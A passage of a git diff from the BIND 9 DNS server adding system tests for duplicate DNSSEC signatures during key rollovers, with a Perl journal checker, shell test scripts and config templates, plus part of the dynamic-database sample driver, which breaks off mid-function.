/^(?<op>add|del) (?<label>\S+)\s+(?<ttl>\d+)\s+IN\s+(?<rrtype>\S+)\s+(?<rdata>.*)/ ) { + my $change = { + op => $+{op}, + label => $+{label}, + ttl => $+{ttl}, + rrtype => $+{rrtype}, + rdata => $+{rdata}, + }; + + if( $change->{op} eq 'del' and $change->{rrtype} eq 'SOA' ) { + if( @changeset ) { + process_changeset( @changeset ); + @changeset = (); + } + } + + push @changeset, $change; + } + else { + die "error parsing journal data"; + } +} + +if( @changeset ) { + process_changeset( @changeset ); +} + +{ + my %rrsig_db; + my %keys; + my $apex; + + sub process_changeset { + my @changeset = @_; + + if( not $apex ) { + # the first record of the first changeset is guaranteed to be the apex + $apex = $changeset[0]{label}; + } + + my $newserial; + my %touched_rrsigs; + my %touched_keys; + + foreach my $change( @changeset ) { + if( $change->{rrtype} eq 'SOA' ) { + if( $change->{op} eq 'add' ) { + if( $change->{rdata} !~ /^\S+ \S+ (?<serial>\d+)/ ) { + die "unable to parse SOA"; + } + + $newserial = $+{serial}; + } + } + elsif( $change->{rrtype} eq 'NSEC' ) { + ; # do nothing + } + elsif( $change->{rrtype} eq 'DNSKEY' ) { + ; # ignore for now + } + elsif( $change->{rrtype} eq 'TYPE65534' and $change->{label} eq $apex ) { + # key status + if( $change->{rdata} !~ /^\\# (?<datasize>\d+) (?<data>[0-9A-F]+)$/ ) { + die "unable to parse key status record"; + } + + my $datasize = $+{datasize}; + my $data = $+{data}; + + if( $datasize == 5 ) { + my( $alg, $id, $flag_del, $flag_done ) = unpack 'CnCC', pack( 'H10', $data ); + + if( $change->{op} eq 'add' ) { + if( not exists $keys{$id} ) { + $touched_keys{$id} //= 1; + + $keys{$id} = { + $data => 1, + rrs => 1, + done_signing => $flag_done, + deleting => $flag_del, + }; + } + else { + if( not exists $keys{$id}{$data} ) { + my $keydata = $keys{$id}; + $touched_keys{$id} = { %$keydata }; + + $keydata->{rrs}++; + $keydata->{$data} = 1; + $keydata->{done_signing} += $flag_done; + $keydata->{deleting} += $flag_del; + } + } + } + else { + # this logic relies upon the convention that there won't + # ever be multiple records with the same flag set + if( exists $keys{$id} ) { + my $keydata = $keys{$id}; + + if( exists $keydata->{$data} ) { + $touched_keys{$id} = { %$keydata }; + + $keydata->{rrs}--; + delete $keydata->{$data}; + $keydata->{done_signing} -= $flag_done; + $keydata->{deleting} -= $flag_del; + + if( $keydata->{rrs} == 0 ) { + delete $keys{$id}; + } + } + } + } + } + else { + die "unexpected key status record content"; + } + } + elsif( $change->{rrtype} eq 'RRSIG' ) { + if( $change->{rdata} !~ /^(?<covers>\S+) \d+ \d+ \d+ (?<validity_end>\d+) (?<validity_start>\d+) (?<signing_key>\d+)/ ) { + die "unable to parse RRSIG rdata"; + } + + $change->{covers} = $+{covers}; + $change->{validity_end} = $+{validity_end}; + $change->{validity_start} = $+{validity_start}; + $change->{signing_key} = $+{signing_key}; + + my $db_key = $change->{label} . ':' . $change->{covers}; + + $rrsig_db{$db_key} //= {}; + $touched_rrsigs{$db_key} = 1; + + if( $change->{op} eq 'add' ) { + $rrsig_db{$db_key}{ $change->{signing_key} } = 1; + } + else { + # del + delete $rrsig_db{$db_key}{ $change->{signing_key} }; + } + } + } + + foreach my $key_id( sort keys %touched_keys ) { + my $old_data; + my $new_data; + + if( ref $touched_keys{$key_id} ) { + $old_data = $touched_keys{$key_id}; + } + + if( exists $keys{$key_id} ) { + $new_data = $keys{$key_id}; + } + + if( $old_data ) { + if( $new_data ) { + print "at serial $newserial key $key_id status changed from ($old_data->{deleting},$old_data->{done_signing}) to ($new_data->{deleting},$new_data->{done_signing})\n"; + } + else { + print "at serial $newserial key $key_id status removed from zone\n"; + } + } + else { + print "at serial $newserial key $key_id status added with flags ($new_data->{deleting},$new_data->{done_signing})\n"; + } + } + + foreach my $rrsig_id( sort keys %touched_rrsigs ) { + my $n_signing_keys = keys %{ $rrsig_db{$rrsig_id} }; + + if( $n_signing_keys == 0 ) { + print "at serial $newserial $rrsig_id went unsigned\n"; + } + elsif( $rrsig_id =~ /:DNSKEY$/ ) { + if( $n_signing_keys != 2 ) { + print "at serial $newserial $rrsig_id was signed $n_signing_keys time(s) when it should have been signed twice\n"; + } + } + elsif( $n_signing_keys > 1 ) { + my @signing_keys = sort { $a <=> $b } keys %{ $rrsig_db{$rrsig_id} }; + print "at serial $newserial $rrsig_id was signed too many times, keys (@signing_keys)\n"; + } + } + } +} diff --git a/bin/tests/system/dupsigs/clean.sh b/bin/tests/system/dupsigs/clean.sh new file mode 100644 index 0000000..2af75a0 --- /dev/null +++ b/bin/tests/system/dupsigs/clean.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out* +rm -f ns1/named.conf +rm -f ns1/named.lock +rm -f ns1/named.memstats +rm -f ns1/named.run +rm -f ns1/signing.test.db +rm -f ns1/signing.test.db.jbk +rm -f ns1/signing.test.db.signed +rm -f ns1/signing.test.db.signed.jnl +rm -f ns1/keys/signing.test/K* +rm -f ns1/managed-keys.bind* diff --git a/bin/tests/system/dupsigs/ns1/named.args b/bin/tests/system/dupsigs/ns1/named.args new file mode 100644 index 0000000..231eed4 --- /dev/null +++ b/bin/tests/system/dupsigs/ns1/named.args @@ -0,0 +1 @@ +-D dupsigs-ns1 -X named.lock -m record,size,mctx -c named.conf -d 99 -g -U 4 -T maxcachesize=2097152 -T sigvalinsecs diff --git a/bin/tests/system/dupsigs/ns1/named.conf.in b/bin/tests/system/dupsigs/ns1/named.conf.in new file mode 100644 index 0000000..494ecfb --- /dev/null +++ b/bin/tests/system/dupsigs/ns1/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + recursion no; + max-journal-size unlimited; + port @PORT@; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + pid-file "named.pid"; +}; + +zone "signing.test" { + type primary; + masterfile-format text; + allow-update { any; }; + file "signing.test.db"; + update-check-ksk yes; + key-directory "keys/signing.test"; + inline-signing yes; + auto-dnssec maintain; + sig-validity-interval 20 5; +}; diff --git a/bin/tests/system/dupsigs/ns1/reset_keys.sh b/bin/tests/system/dupsigs/ns1/reset_keys.sh new file mode 100644 index 0000000..4faa0bb --- /dev/null +++ b/bin/tests/system/dupsigs/ns1/reset_keys.sh @@ -0,0 +1,100 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=signing.test +rm -rf keys/signing.test +mkdir -p keys/signing.test + +timetodnssec() { + $PERL -e 'my ($S,$M,$H,$d,$m,$y,$x) = gmtime(@ARGV[0]); + printf("%04u%02u%02u%02u%02u%02u\n", $y+1900,$m+1,$d,$H,$M,$S);' ${1} +} + +KEYDIR=keys/signing.test +KSK=`$KEYGEN -a RSASHA256 -K $KEYDIR -q -f KSK $zone` + +ZSK0=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK1=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK2=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK3=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK4=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK5=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK6=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK7=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK8=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK9=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` + +# clear all times on all keys +for FILEN in keys/signing.test/*.key +do + $SETTIME -P none -A none -R none -I none -D none $FILEN +done + +BASE=`date +%s` +BASET=`timetodnssec $BASE` + +# reset the publish and activation time on the KSK +$SETTIME -P $BASET -A $BASET $KEYDIR/$KSK + +# reset the publish and activation time on the first ZSK +$SETTIME -P $BASET -A $BASET $KEYDIR/$ZSK0 + +# schedule the first roll +R1=`expr $BASE + 50` +R1T=`timetodnssec $R1` + +$SETTIME -I $R1T $KEYDIR/$ZSK0 +$SETTIME -P $BASET -A $R1T $KEYDIR/$ZSK1 + +# schedule the second roll (which includes the delete of the first key) +R2=`expr $R1 + 50` +R2T=`timetodnssec $R2` +DT=$R2 +DTT=`timetodnssec $DT` + +$SETTIME -D $DTT $KEYDIR/$ZSK0 +$SETTIME -I $R2T $KEYDIR/$ZSK1 +$SETTIME -P $R1T -A $R2T $KEYDIR/$ZSK2 + +# schedule the third roll +R3=`expr $R2 + 25` +R3T=`timetodnssec $R3` + +$SETTIME -D $R3T $KEYDIR/$ZSK1 +$SETTIME -I $R3T $KEYDIR/$ZSK2 +$SETTIME -P $R2T -A $R3T $KEYDIR/$ZSK3 + +$SETTIME -P $R3T $KEYDIR/$ZSK4 + +echo KSK=$KSK +echo ZSK0=$ZSK0 +echo ZSK1=$ZSK1 +echo ZSK2=$ZSK2 +echo ZSK3=$ZSK3 +echo ZSK4=$ZSK4 + +exit + +# schedule the fourth roll +# this isn't long enough for the signing to complete and would result in +# duplicate signatures, see +# https://gitlab.isc.org/isc-projects/bind9/-/merge_requests/231#note_9597 +R4=`expr $R3 + 10` +R4T=`timetodnssec $R4` + +$SETTIME -D $R4T $KEYDIR/$ZSK2 +$SETTIME -I $R4T $KEYDIR/$ZSK3 +$SETTIME -P $R3T -A $R4T $KEYDIR/$ZSK4 diff --git a/bin/tests/system/dupsigs/ns1/signing.test.db.in b/bin/tests/system/dupsigs/ns1/signing.test.db.in new file mode 100644 index 0000000..b522b6f --- /dev/null +++ b/bin/tests/system/dupsigs/ns1/signing.test.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA ns root.ns 1996072700 3600 1800 86400 60 +@ NS ns +ns A 127.0.0.1 +ns AAAA ::1 + +$GENERATE 0-499 a${0,4,d} AAAA ::$ diff --git a/bin/tests/system/dupsigs/setup.sh b/bin/tests/system/dupsigs/setup.sh new file mode 100644 index 0000000..f687543 --- /dev/null +++ b/bin/tests/system/dupsigs/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +test -r $RANDFILE || $GENRANDOM 800 $RANDFILE + +copy_setports ns1/named.conf.in ns1/named.conf + +cp -f ns1/signing.test.db.in ns1/signing.test.db +(cd ns1; $SHELL ./reset_keys.sh) diff --git a/bin/tests/system/dupsigs/tests.sh b/bin/tests/system/dupsigs/tests.sh new file mode 100644 index 0000000..dfc88ce --- /dev/null +++ b/bin/tests/system/dupsigs/tests.sh @@ -0,0 +1,70 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +# Wait for the zone to be fully signed before beginning test +# +# We expect the zone to have the following: +# +# - 6 signatures for signing.test. +# - 3 signatures for ns.signing.test. +# - 2 x 500 signatures for a{0000-0499}.signing.test. +# +# for a total of 1009. +fully_signed () { + $DIG axfr signing.test -p ${PORT} @10.53.0.1 > "dig.out.ns1.axfr" + awk 'BEGIN { lines = 0 } + $4 == "RRSIG" {lines++} + END { if (lines != 1009) exit(1) }' < "dig.out.ns1.axfr" +} + +# Wait for the last NSEC record in the zone to be signed. This is a lightweight +# alternative to avoid many AXFR requests while waiting for the zone to be +# fully signed. +_wait_for_last_nsec_signed() { + $DIG +dnssec a0499.signing.test -p ${PORT} @10.53.0.1 nsec > "dig.out.ns1.wait" || return 1 + grep "signing.test\..*IN.*RRSIG.*signing.test" "dig.out.ns1.wait" > /dev/null || return 1 + return 0 +} + +echo_i "wait for the zone to be fully signed" +retry_quiet 60 _wait_for_last_nsec_signed +retry_quiet 10 fully_signed || status=1 +if [ $status != 0 ]; then echo_i "failed"; fi + +start=`date +%s` +now=$start +end=$((start + 140)) + +while [ $now -lt $end ] && [ $status -eq 0 ]; do + et=$((now - start)) + echo_i "............... $et ............" + $JOURNALPRINT ns1/signing.test.db.signed.jnl | $PERL check_journal.pl | cat_i + $DIG axfr signing.test -p ${PORT} @10.53.0.1 > dig.out.at$et + awk '$4 == "RRSIG" { print $11 }' dig.out.at$et | sort | uniq -c | cat_i + lines=`awk '$4 == "RRSIG" { print}' dig.out.at$et | wc -l` + if [ ${et} -ne 0 -a ${lines} -ne 1009 ] + then + echo_i "failed" + status=$((status + 1)) + fi + sleep 5 + now=`date +%s` +done + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dyndb/Makefile.in b/bin/tests/system/dyndb/Makefile.in new file mode 100644 index 0000000..9a862db --- /dev/null +++ b/bin/tests/system/dyndb/Makefile.in @@ -0,0 +1,23 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +SUBDIRS = driver +TARGETS = + +@BIND9_MAKE_RULES@ diff --git a/bin/tests/system/dyndb/clean.sh b/bin/tests/system/dyndb/clean.sh new file mode 100644 index 0000000..cb8ae94 --- /dev/null +++ b/bin/tests/system/dyndb/clean.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after dyndb tests. +# +rm -f */named.conf +rm -f */named.run +rm -f ns1/named.memstats +rm -f ns1/update.txt +rm -f added.a.out.* +rm -f added.ptr.out.* +rm -f deleted.a.out.* +rm -f deleted.ptr.out.* +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/dyndb/driver/AUTHORS b/bin/tests/system/dyndb/driver/AUTHORS new file mode 100644 index 0000000..5b37853 --- /dev/null +++ b/bin/tests/system/dyndb/driver/AUTHORS @@ -0,0 +1,33 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 AND ISC + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Copyright (C) 2009-2015 Red Hat + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH +REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +PERFORMANCE OF THIS SOFTWARE. + +This sample driver is based on bind-dyndb-ldap project and small portions +of code from ISC BIND 9.10. + +Authors listed in alphabetical order: +Adam Tkac <atkac@redhat.com> +Jiri Kuncar <jkuncar@redhat.com> +Martin Nagy <mnagy@redhat.com> +Petr Spacek <pspacek@redhat.com> diff --git a/bin/tests/system/dyndb/driver/Makefile.in b/bin/tests/system/dyndb/driver/Makefile.in new file mode 100644 index 0000000..a3d6726 --- /dev/null +++ b/bin/tests/system/dyndb/driver/Makefile.in @@ -0,0 +1,60 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \ + ${OPENSSL_CFLAGS} + +CDEFINES = +CWARNINGS = + +DNSLIBS = ../../../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@ +ISCLIBS = ../../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ + +DNSDEPLIBS = ../../../../../lib/dns/libdns.@A@ +ISCDEPLIBS = ../../../../../lib/isc/libisc.@A@ + +DEPLIBS = ${DNSDEPLIBS} ${ISCDEPLIBS} + +LIBS = ${DNSLIBS} ${ISCLIBS} @LIBS@ + + +SRCS = db.c driver.c instance.c \ + lock.c log.c syncptr.c zone.c + +OBJS = db.@O@ driver.@O@ instance.@O@ \ + lock.@O@ log.@O@ syncptr.@O@ zone.@O@ + +SO_TARGETS = lib/sample.@SO@ +TARGETS = @SO_TARGETS@ +SO_STRIP = @SO_STRIP@ + +@BIND9_MAKE_RULES@ + +CFLAGS = @CFLAGS@ @SO_CFLAGS@ +SO_LDFLAGS = @LDFLAGS@ @SO_LDFLAGS@ + +lib/sample.@SO@: sample.@SO@ + $(SHELL) ${top_srcdir}/mkinstalldirs `pwd`/lib + ${LIBTOOL_MODE_INSTALL} ${INSTALL} sample.@SO@ `pwd`/lib + +sample.@SO@: ${OBJS} ${DNSDEPLIBS} ${ISCDEPLIBS} + CLEANED=`echo "${DNSLIBS} ${ISCLIBS} @DNS_CRYPTO_LIBS@ ${LIBS}" | ${SO_STRIP}`; \ + ${LIBTOOL_MODE_LINK} @SO_LD@ ${SO_LDFLAGS} -o $@ ${OBJS} \ + $${CLEANED} + +clean distclean:: + rm -f ${OBJS} sample.so lib/sample.so diff --git a/bin/tests/system/dyndb/driver/README b/bin/tests/system/dyndb/driver/README new file mode 100644 index 0000000..db73396 --- /dev/null +++ b/bin/tests/system/dyndb/driver/README @@ -0,0 +1,92 @@ +<!-- +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 and ISC + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Copyright (C) Red Hat + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH +REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +PERFORMANCE OF THIS SOFTWARE. +--> + +To use the Dynamic DB sample driver, run named and check the log. + + $ cd testing + $ named -gc named.conf + +You should be able to see something like: + +zone test/IN: loaded serial 0 +zone arpa/IN: loaded serial 0 + +This means that the sample driver created empty zones "test." and +"arpa." as defined by "arg" parameters in named.conf. + +$ dig @localhost test. + +should work as usual and you should be able to see the dummy zone with +NS record pointing to the zone apex and A record with 127.0.0.1: + +;; ANSWER SECTION: +test. 86400 IN A 127.0.0.1 +test. 86400 IN NS test. +test. 86400 IN SOA test. test. 0 28800 7200 604800 86400 + +This driver creates two empty zones and allows query/transfer/update to +all IP addresses for demonstration purposes. + +The driver wraps the RBT database implementation used natively by BIND, +and modifies the addrdataset() and substractrdataset() functions to do +additional work during dynamic updates. + +A dynamic update modifies the target zone as usual. After that, the +driver detects whether the modified RR was of type A or AAAA, and if so, +attempts to appropriately generate or delete a matching PTR record in +one of the two zones managed by the driver. + +E.g.: + +$ nsupdate +> update add a.test. 300 IN A 192.0.2.1 +> send + +will add the A record +a.test. 300 IN A 192.0.2.1 + +and also automatically generate the PTR record +1.2.0.192.in-addr.arpa. 300 IN PTR a.test. + +AXFR and RR deletion via dynamic updates should work as usual. Deletion +of a type A or AAAA record should delete the corresponding PTR record +too. + +The zone is stored only in memory, and all changes will be lost on +reload/reconfig. + +Hints for code readers: +- Driver initialization starts in driver.c: dyndb_init() function. +- New database implementation is registered by calling dns_db_register() + and passing a function pointer to it. This sample uses the function + create_db() to initialize the database. +- Zones are created later in instance.c: load_sample_instance_zones(). +- Database entry points are in structure db.c: dns_dbmethods_t + sampledb_methods +- sampledb_methods points to an implementation of the database interface. + See the db.c: addrdataset() implementation and look at how the RBT + database instance is wrapped into an additional layer of logic. diff --git a/bin/tests/system/dyndb/driver/db.c b/bin/tests/system/dyndb/driver/db.c new file mode 100644 index 0000000..bed7d3e --- /dev/null +++ b/bin/tests/system/dyndb/driver/db.c @@ -0,0 +1,814 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) 2009-2015 Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Database API implementation. The interface is defined in lib/dns/db.h. + * + * dns_db_*() calls on database instances backed by this driver use + * struct sampledb_methods to find appropriate function implementation. + * + * This example re-uses RBT DB implementation from original BIND and blindly + * proxies most of dns_db_*() calls to this underlying RBT DB. + * See struct sampledb below. + */ + +#include "db.h" +#include <inttypes.h> +#include <stdbool.h> + +#include <isc/string.h> +#include <isc/util.h> + +#include <dns/db.h> +#include <dns/diff.h> +#include <dns/enumclass.h> +#include <dns/rbt.h> +#include <dns/rdatalist.h> +#include <dns/rdatastruct.h> +#include <dns/soa.h> +#include <dns/types.h> + +#include "instance.h" +#include "syncptr.h" +#include "util.h" + +#define SAMPLEDB_MAGIC ISC_MAGIC('S', 'M', 'D', 'B') +#define VALID_SAMPLEDB(sampledb) \ + ((sampledb) != NULL && (sampledb)->common.impmagic == SAMPLEDB_MAGIC) + +struct sampledb { + dns_db_t common; + isc_refcount_t refs; + sample_instance_t *inst; + + /* + * Internal RBT database implementation provided by BIND. + * Most dns_db_* calls (find(), createiterator(), etc.) + * are blindly forwarded to this RBT DB. + */ + dns_db_t *rbtdb; +}; + +typedef struct sampledb sampledb_t; + +/* + * Get full DNS name from the node. + * + * @warning + * The code silently expects that "node" came from RBTDB and thus + * assumption dns_dbnode_t (from RBTDB) == dns_rbtnode_t is correct. + * + * This should work as long as we use only RBTDB and nothing else. + */ +static isc_result_t +sample_name_fromnode(dns_dbnode_t *node, dns_name_t *name) { + dns_rbtnode_t *rbtnode = (dns_rbtnode_t *)node; + return (dns_rbt_fullnamefromnode(rbtnode, name)); +} + +static void +attach(dns_db_t *source, dns_db_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)source; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + isc_refcount_increment(&sampledb->refs); + *targetp = source; +} + +static void +free_sampledb(sampledb_t *sampledb) { + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_detach(&sampledb->rbtdb); + dns_name_free(&sampledb->common.origin, sampledb->common.mctx); + isc_mem_putanddetach(&sampledb->common.mctx, sampledb, + sizeof(*sampledb)); +} + +static void +detach(dns_db_t **dbp) { + REQUIRE(dbp != NULL && VALID_SAMPLEDB((sampledb_t *)(*dbp))); + sampledb_t *sampledb = (sampledb_t *)(*dbp); + *dbp = NULL; + + if (isc_refcount_decrement(&sampledb->refs) == 1) { + free_sampledb(sampledb); + } +} + +/* + * This method should never be called, because DB is "persistent". + * See ispersistent() function. It means that database do not need to be + * loaded in the usual sense. + */ +static isc_result_t +beginload(dns_db_t *db, dns_rdatacallbacks_t *callbacks) { + UNUSED(db); + UNUSED(callbacks); + + fatal_error("current implementation should never call beginload()"); + + /* Not reached */ + return (ISC_R_SUCCESS); +} + +/* + * This method should never be called, because DB is "persistent". + * See ispersistent() function. It means that database do not need to be + * loaded in the usual sense. + */ +static isc_result_t +endload(dns_db_t *db, dns_rdatacallbacks_t *callbacks) { + UNUSED(db); + UNUSED(callbacks); + + fatal_error("current implementation should never call endload()"); + + /* Not reached */ + return (ISC_R_SUCCESS); +} + +static isc_result_t +serialize(dns_db_t *db, dns_dbversion_t *version, FILE *file) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_serialize(sampledb->rbtdb, version, file)); +} + +static isc_result_t +dump(dns_db_t *db, dns_dbversion_t *version, const char *filename, + dns_masterformat_t masterformat) { + UNUSED(db); + UNUSED(version); + UNUSED(filename); + UNUSED(masterformat); + + fatal_error("current implementation should never call dump()"); + + /* Not reached */ + return (ISC_R_SUCCESS); +} + +static void +currentversion(dns_db_t *db, dns_dbversion_t **versionp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_currentversion(sampledb->rbtdb, versionp); +} + +static isc_result_t +newversion(dns_db_t *db, dns_dbversion_t **versionp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_newversion(sampledb->rbtdb, versionp)); +} + +static void +attachversion(dns_db_t *db, dns_dbversion_t *source, + dns_dbversion_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_attachversion(sampledb->rbtdb, source, targetp); +} + +static void +closeversion(dns_db_t *db, dns_dbversion_t **versionp, bool commit) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_closeversion(sampledb->rbtdb, versionp, commit); +} + +static isc_result_t +findnode(dns_db_t *db, const dns_name_t *name, bool create, + dns_dbnode_t **nodep) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findnode(sampledb->rbtdb, name, create, nodep)); +} + +static isc_result_t +find(dns_db_t *db, const dns_name_t *name, dns_dbversion_t *version, + 